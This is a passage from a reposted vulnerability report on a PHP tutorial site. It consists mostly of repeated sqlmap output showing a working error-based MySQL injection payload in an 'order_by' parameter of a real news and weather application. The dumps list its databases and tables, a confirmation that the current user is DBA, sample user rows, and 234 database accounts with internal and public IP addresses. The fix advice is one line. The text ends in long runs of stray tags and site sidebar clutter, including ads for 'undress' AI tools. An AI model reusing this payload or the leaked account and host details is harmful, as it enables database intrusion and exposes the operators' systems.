INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>current user is DBA:	'True'<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: apphistory_news<br>[5 tables]<br>+-------------+<br>| figure	|<br>| hot_tag	 |<br>| relate_news |<br>| relate_pic|<br>| stats	 |<br>+-------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_weather<br>[5 tables]<br>+-------------+<br>| abroad	|<br>| airport	 |<br>| internal	|<br>| nephogram |<br>| relate_news |<br>+-------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_news<br>[23 tables]<br>+-----------------------------+<br>| hash						|<br>| hdphoto					 |<br>| ip_test					 |<br>| lianghui_2010			 |<br>| lianghui_2010_copy_20100226 |<br>| lianghui_2010_lhyl		|<br>| lianghui_2012			 |<br>| lianghui_2012_lhyl		|<br>| special_diqiuyixiaoshi2010|<br>| special_martyr			|<br>| special_qinghaiyushudizhen|<br>| special_xinanhanzai		 |<br>| timeline					|<br>| tw_vote					 |<br>| upload					|<br>| upload_20121116			 |<br>| upload_v					|<br>| user_test				 |<br>| vote_category			 |<br>| vote_detail				 |<br>| weather_yb				|<br>| weather_yb_tomorrow		 |<br>| weather_zh				|<br>+-----------------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_news<br>Table: user_test<br>[2 entries]<br>+----+--------------+------+---------+-------------+---------------------+<br>| id | ip		 | lock | intro | username	| rec_time			|<br>+----+--------------+------+---------+-------------+---------------------+<br>| 1| 220.181.24.2 |	| <blank> | wangyun1127 | 2010-05-10 14:27:06 |<br>| 2| 220.181.24.2 |	| c100	| c100		| 0000-00-00 00:00:00 |<br>+----+--------------+------+---------+-------------+---------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_news<br>Table: hash<br>[10 entries]<br>+----+--------------+--------+<br>| id | name		 | value|<br>+----+--------------+--------+<br>| 1| ygdx_gd	| 258	|<br>| 2| ygdx_bsd	 | 306	|<br>| 3| ygdx_zmd	 | 57	 |<br>| 4| ygdx_time	| 5月8日 |<br>| 5| wudu2010_hlb | 198864 |<br>| 6| wudu2010_szc | 150782 |<br>| 7| wudu2010_wyc | 0	|<br>| 8| wudu2010_xsh | 0	|<br>| 9| wudu2010_wwm | 0	|<br>| 10 | wudu2010_zll | 358715 |<br>+----+--------------+--------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_news<br>Table: lianghui_2012<br>[10 entries]<br>+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br>| id | type | title | verify | delete | cai_num | content | ding_num | user_name	| user_type | click_num | debate_num | submit_time		 |<br>+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br>| 1| 1	| 1	 | 1	|		| 2	 | 1	 | 3		| kuaibo_10501 | 1		 | 7		 | 0		| 2012-02-28 17:44:30 |<br>| 2| 1	| 11	| 1	|		| 0	 | 1	 | 1		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:46:47 |<br>| 3| 1	| 2	 | 1	|		| 0	 | 2	 | 1		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:46:54 |<br>| 4| 1	| 3	 | 1	|		| 0	 | 3	 | 0		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:46:59 |<br>| 5| 1	| 4	 | 1	|		| 0	 | 4	 | 0		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:47:05 |<br>| 6| 1	| 5	 | 1	|		| 1	 | 5	 | 0		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:47:09 |<br>| 7| 1	| 5	 | 1	|		| 1	 | 5	 | 20	 | kuaibo_10501 | 1		 | 97		| 0		| 2012-02-29 15:47:17 |<br>| 8| 1	| 6	 | 1	|		| 0	 | 6	 | 5		| kuaibo_10501 | 1		 | 107	 | 0		| 2012-02-29 15:47:22 |<br>| 9| 1	| 7	 | 1	|		| 0	 | 7	 | 91	 | kuaibo_10501 | 1		 | 235	 | 0		| 2012-02-29 15:47:26 |<br>| 10 | 1	| 8	 | 1	|		| 2	 | 8	 | 2		| kuaibo_10501 | 1		 | 97		| 0		| 2012-02-29 15:47:31 |<br>+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>current user is DBA:	'True'<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>database management system users [234]:<br>[*] ''@'localhost'<br>[*] 'B74wNuTbbx'@'10.11.2.89'<br>[*] 'B74wNuTbbx'@'10.11.2.90'<br>[*] 'B74wNuTbbx'@'10.13.2.134'<br>[*] 'B74wNuTbbx'@'10.13.2.135'<br>[*] 'B74wNuTbbx'@'10.13.2.176'<br>[*] 'B74wNuTbbx'@'10.13.2.177'<br>[*] 'B74wNuTbbx'@'220.181.67.192'<br>[*] 'iadmin'@'211.151.61.77'<br>[*] 'root'@'10.13.2.132'<br>[*] 'root'@'10.13.2.134'<br>[*] 'root'@'10.13.2.135'<br>[*] 'root'@'10.13.2.176'<br>[*] 'root'@'10.13.2.177'<br>[*] 'root'@'127.0.0.1'<br>[*] 'root'@'192.168.2.162'<br>[*] 'root'@'192.168.2.167'<br>[*] 'root'@'220.181.24.100'<br>[*] 'root'@'220.181.24.166'<br>[*] 'root'@'220.181.24.2'<br>[*] 'root'@'220.181.67.192'<br>[*] 'root'@'localhost'<br>[*] 'zabbix'@'127.0.0.1'</blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></code>

Copy after login

修复方案：

还是防注入吧

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

Assassin's Creed Shadows: Seashell Riddle Solution

3 weeks ago By DDD

What's New in Windows 11 KB5054979 & How to Fix Update Issues

2 weeks ago By DDD

Where to find the Crane Control Keycard in Atomfall

3 weeks ago By DDD

Assassin's Creed Shadows - How To Find The Blacksmith And Unlock Weapon And Armour Customisation

4 weeks ago By DDD

Roblox: Dead Rails - How To Complete Every Challenge

3 weeks ago By DDD

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Where is the login entrance for gmail email?

7575

CakePHP Tutorial

1386

What is the format of the account name of steam

win11 activation key permanent

nyt connections hints and answers

110

Related knowledge

Explain InnoDB Full-Text Search capabilities. Apr 02, 2025 pm 06:09 PM

InnoDB's full-text search capabilities are very powerful, which can significantly improve database query efficiency and ability to process large amounts of text data. 1) InnoDB implements full-text search through inverted indexing, supporting basic and advanced search queries. 2) Use MATCH and AGAINST keywords to search, support Boolean mode and phrase search. 3) Optimization methods include using word segmentation technology, periodic rebuilding of indexes and adjusting cache size to improve performance and accuracy.

When might a full table scan be faster than using an index in MySQL? Apr 09, 2025 am 12:05 AM

Full table scanning may be faster in MySQL than using indexes. Specific cases include: 1) the data volume is small; 2) when the query returns a large amount of data; 3) when the index column is not highly selective; 4) when the complex query. By analyzing query plans, optimizing indexes, avoiding over-index and regularly maintaining tables, you can make the best choices in practical applications.

Can I install mysql on Windows 7 Apr 08, 2025 pm 03:21 PM

Yes, MySQL can be installed on Windows 7, and although Microsoft has stopped supporting Windows 7, MySQL is still compatible with it. However, the following points should be noted during the installation process: Download the MySQL installer for Windows. Select the appropriate version of MySQL (community or enterprise). Select the appropriate installation directory and character set during the installation process. Set the root user password and keep it properly. Connect to the database for testing. Note the compatibility and security issues on Windows 7, and it is recommended to upgrade to a supported operating system.

Difference between clustered index and non-clustered index (secondary index) in InnoDB. Apr 02, 2025 pm 06:25 PM

The difference between clustered index and non-clustered index is: 1. Clustered index stores data rows in the index structure, which is suitable for querying by primary key and range. 2. The non-clustered index stores index key values and pointers to data rows, and is suitable for non-primary key column queries.

What are some popular MySQL GUI tools (e.g., MySQL Workbench, phpMyAdmin)? Mar 21, 2025 pm 06:28 PM

Article discusses popular MySQL GUI tools like MySQL Workbench and phpMyAdmin, comparing their features and suitability for beginners and advanced users.[159 characters]

How do you handle large datasets in MySQL? Mar 21, 2025 pm 12:15 PM

Article discusses strategies for handling large datasets in MySQL, including partitioning, sharding, indexing, and query optimization.

Explain different types of MySQL indexes (B-Tree, Hash, Full-text, Spatial). Apr 02, 2025 pm 07:05 PM

MySQL supports four index types: B-Tree, Hash, Full-text, and Spatial. 1.B-Tree index is suitable for equal value search, range query and sorting. 2. Hash index is suitable for equal value searches, but does not support range query and sorting. 3. Full-text index is used for full-text search and is suitable for processing large amounts of text data. 4. Spatial index is used for geospatial data query and is suitable for GIS applications.

MySQL: Simple Concepts for Easy Learning Apr 10, 2025 am 09:29 AM

MySQL is an open source relational database management system. 1) Create database and tables: Use the CREATEDATABASE and CREATETABLE commands. 2) Basic operations: INSERT, UPDATE, DELETE and SELECT. 3) Advanced operations: JOIN, subquery and transaction processing. 4) Debugging skills: Check syntax, data type and permissions. 5) Optimization suggestions: Use indexes, avoid SELECT* and use transactions.

See all articles